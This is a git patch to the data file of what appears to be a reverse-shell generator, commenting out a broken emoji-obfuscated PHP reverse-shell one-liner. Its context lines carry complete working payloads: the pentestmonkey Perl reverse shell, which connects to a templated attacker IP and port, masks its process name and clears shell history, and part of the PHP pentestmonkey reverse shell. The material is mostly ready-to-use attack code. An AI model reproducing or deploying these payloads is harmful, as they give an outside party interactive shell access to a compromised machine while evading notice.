From 1e305ca8a9ec50cb4df0e98c28851bafadd35a75 Mon Sep 17 00:00:00 2001 From: Ryan Montgomery <44453666+0dayCTF@users.noreply.github.com> Date: Thu, 19 Jan 2023 15:33:57 -0500 Subject: [PATCH] Update data.js Commented out PHP Emoji, currently broken. --- js/data.js | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/js/data.js b/js/data.js index 5978b4c..64ded9d 100644 --- a/js/data.js +++ b/js/data.js @@ -130,11 +130,11 @@ const reverseShellCommands = withCommandType( "command": `#!/usr/bin/perl -w\n# perl-reverse-shell - A Reverse Shell implementation in PERL\n# Copyright (C) 2006 pentestmonkey@pentestmonkey.net\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. The author accepts no liability\n# for damage caused by this tool. If these terms are not acceptable to you, then\n# do not use this tool.\n#\n# In all other respects the GPL version 2 applies:\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. If these terms are not acceptable to\n# you, then do not use this tool.\n#\n# You are encouraged to send comments, improvements or suggestions to\n# me at pentestmonkey@pentestmonkey.net\n#\n# Description\n# -----------\n# This script will make an outbound TCP connection to a hardcoded IP and port.\n# The recipient will be given a shell running as the current user (apache normally).\n#\n\nuse strict;\nuse Socket;\nuse FileHandle;\nuse POSIX;\nmy $VERSION = "1.0";\n\n# Where to send the reverse shell. Change these.\nmy $ip = '{ip}';\nmy $port = {port};\n\n# Options\nmy $daemon = 1;\nmy $auth = 0; # 0 means authentication is disabled and any \n # source IP can access the reverse shell\nmy $authorised_client_pattern = qr(^127\\.0\\.0\\.1$);\n\n# Declarations\nmy $global_page = "";\nmy $fake_process_name = "/usr/sbin/apache";\n\n# Change the process name to be less conspicious\n$0 = "[httpd]";\n\n# Authenticate based on source IP address if required\nif (defined($ENV{'REMOTE_ADDR'})) {\n cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");\n\n if ($auth) {\n unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {\n cgiprint("ERROR: Your client isn't authorised to view this page");\n cgiexit();\n }\n }\n} elsif ($auth) {\n cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");\n cgiexit(0);\n}\n\n# Background and dissociate from parent process if required\nif ($daemon) {\n my $pid = fork();\n if ($pid) {\n cgiexit(0); # parent exits\n }\n\n setsid();\n chdir('/');\n umask(0);\n}\n\n# Make TCP connection for reverse shell\nsocket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));\nif (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {\n cgiprint("Sent reverse shell to $ip:$port");\n cgiprintpage();\n} else {\n cgiprint("Couldn't open reverse shell to $ip:$port: $!");\n cgiexit(); \n}\n\n# Redirect STDIN, STDOUT and STDERR to the TCP connection\nopen(STDIN, ">&SOCK");\nopen(STDOUT,">&SOCK");\nopen(STDERR,">&SOCK");\n$ENV{'HISTFILE'} = '/dev/null';\nsystem("w;uname -a;id;pwd");\nexec({"{shell}"} ($fake_process_name, "-i"));\n\n# Wrapper around print\nsub cgiprint {\n my $line = shift;\n $line .= "

\\n";\n $global_page .= $line;\n}\n\n# Wrapper around exit\nsub cgiexit {\n cgiprintpage();\n exit 0; # 0 to ensure we don't give a 500 response.\n}\n\n# Form HTTP response using all the messages gathered by cgiprint so far\nsub cgiprintpage {\n print "Content-Length: " . length($global_page) . "\\r\nConnection: close\\r\nContent-Type: text\\/html\\r\\n\\r\\n" . $global_page;\n}\n`, "meta": ["linux", "mac"] }, - { - "name": "PHP Emoji", - "command": "php -r '$๐Ÿ˜€=\"1\";$๐Ÿ˜=\"2\";$๐Ÿ˜…=\"3\";$๐Ÿ˜†=\"4\";$๐Ÿ˜‰=\"5\";$๐Ÿ˜Š=\"6\";$๐Ÿ˜Ž=\"7\";$๐Ÿ˜=\"8\";$๐Ÿ˜š=\"9\";$๐Ÿ™‚=\"0\";$๐Ÿคข=\" \";$๐Ÿค“=\"<\";$๐Ÿค =\">\";$๐Ÿ˜ฑ=\"-\";$๐Ÿ˜ต=\"&\";$๐Ÿคฉ=\"i\";$๐Ÿค”=\".\";$๐Ÿคจ=\"/\";$๐Ÿฅฐ=\"a\";$๐Ÿ˜=\"b\";$๐Ÿ˜ถ=\"i\";$๐Ÿ™„=\"h\";$๐Ÿ˜‚=\"c\";$๐Ÿคฃ=\"d\";$๐Ÿ˜ƒ=\"e\";$๐Ÿ˜„=\"f\";$๐Ÿ˜‹=\"k\";$๐Ÿ˜˜=\"n\";$๐Ÿ˜—=\"o\";$๐Ÿ˜™=\"p\";$๐Ÿค—=\"s\";$๐Ÿ˜‘=\"x\";$๐Ÿ’€ = $๐Ÿ˜„. $๐Ÿค—. $๐Ÿ˜—. $๐Ÿ˜‚. $๐Ÿ˜‹. $๐Ÿ˜—. $๐Ÿ˜™. $๐Ÿ˜ƒ. $๐Ÿ˜˜;$๐Ÿš€ = \"{ip}\";$๐Ÿ’ป = {port};$๐Ÿš = \"{shell}\". $๐Ÿคข. $๐Ÿ˜ฑ. $๐Ÿคฉ. $๐Ÿคข. $๐Ÿค“. $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿ˜. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…;$๐Ÿคฃ = $๐Ÿ’€($๐Ÿš€,$๐Ÿ’ป);$๐Ÿ‘ฝ = $๐Ÿ˜ƒ. $๐Ÿ˜‘. $๐Ÿ˜ƒ. $๐Ÿ˜‚;$๐Ÿ‘ฝ($๐Ÿš);'", - "meta": ["linux", "mac"] - }, +// { +// "name": "PHP Emoji", +// "command": "php -r '$๐Ÿ˜€=\"1\";$๐Ÿ˜=\"2\";$๐Ÿ˜…=\"3\";$๐Ÿ˜†=\"4\";$๐Ÿ˜‰=\"5\";$๐Ÿ˜Š=\"6\";$๐Ÿ˜Ž=\"7\";$๐Ÿ˜=\"8\";$๐Ÿ˜š=\"9\";$๐Ÿ™‚=\"0\";$๐Ÿคข=\" \";$๐Ÿค“=\"<\";$๐Ÿค =\">\";$๐Ÿ˜ฑ=\"-\";$๐Ÿ˜ต=\"&\";$๐Ÿคฉ=\"i\";$๐Ÿค”=\".\";$๐Ÿคจ=\"/\";$๐Ÿฅฐ=\"a\";$๐Ÿ˜=\"b\";$๐Ÿ˜ถ=\"i\";$๐Ÿ™„=\"h\";$๐Ÿ˜‚=\"c\";$๐Ÿคฃ=\"d\";$๐Ÿ˜ƒ=\"e\";$๐Ÿ˜„=\"f\";$๐Ÿ˜‹=\"k\";$๐Ÿ˜˜=\"n\";$๐Ÿ˜—=\"o\";$๐Ÿ˜™=\"p\";$๐Ÿค—=\"s\";$๐Ÿ˜‘=\"x\";$๐Ÿ’€ = $๐Ÿ˜„. $๐Ÿค—. $๐Ÿ˜—. $๐Ÿ˜‚. $๐Ÿ˜‹. $๐Ÿ˜—. $๐Ÿ˜™. $๐Ÿ˜ƒ. $๐Ÿ˜˜;$๐Ÿš€ = \"{ip}\";$๐Ÿ’ป = {port};$๐Ÿš = \"{shell}\". $๐Ÿคข. $๐Ÿ˜ฑ. $๐Ÿคฉ. $๐Ÿคข. $๐Ÿค“. $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿ˜. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…;$๐Ÿคฃ = $๐Ÿ’€($๐Ÿš€,$๐Ÿ’ป);$๐Ÿ‘ฝ = $๐Ÿ˜ƒ. $๐Ÿ˜‘. $๐Ÿ˜ƒ. $๐Ÿ˜‚;$๐Ÿ‘ฝ($๐Ÿš);'", +// "meta": ["linux", "mac"] +// }, { "name": "PHP PentestMonkey", "command": " array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\tif (feof($sock)) {\n\t\tprintit(\"ERROR: Shell connection terminated\");\n\t\tbreak;\n\t}\n\n\tif (feof($pipes[1])) {\n\t\tprintit(\"ERROR: Shell process terminated\");\n\t\tbreak;\n\t}\n\n\t$read_a = array($sock, $pipes[1], $pipes[2]);\n\t$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n\tif (in_array($sock, $read_a)) {\n\t\tif ($debug) printit(\"SOCK READ\");\n\t\t$input = fread($sock, $chunk_size);\n\t\tif ($debug) printit(\"SOCK: $input\");\n\t\tfwrite($pipes[0], $input);\n\t}\n\n\tif (in_array($pipes[1], $read_a)) {\n\t\tif ($debug) printit(\"STDOUT READ\");\n\t\t$input = fread($pipes[1], $chunk_size);\n\t\tif ($debug) printit(\"STDOUT: $input\");\n\t\tfwrite($sock, $input);\n\t}\n\n\tif (in_array($pipes[2], $read_a)) {\n\t\tif ($debug) printit(\"STDERR READ\");\n\t\t$input = fread($pipes[2], $chunk_size);\n\t\tif ($debug) printit(\"STDERR: $input\");\n\t\tfwrite($sock, $input);\n\t}\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\nfunction printit ($string) {\n\tif (!$daemon) {\n\t\tprint \"$string\\n\";\n\t}\n}\n\n?>",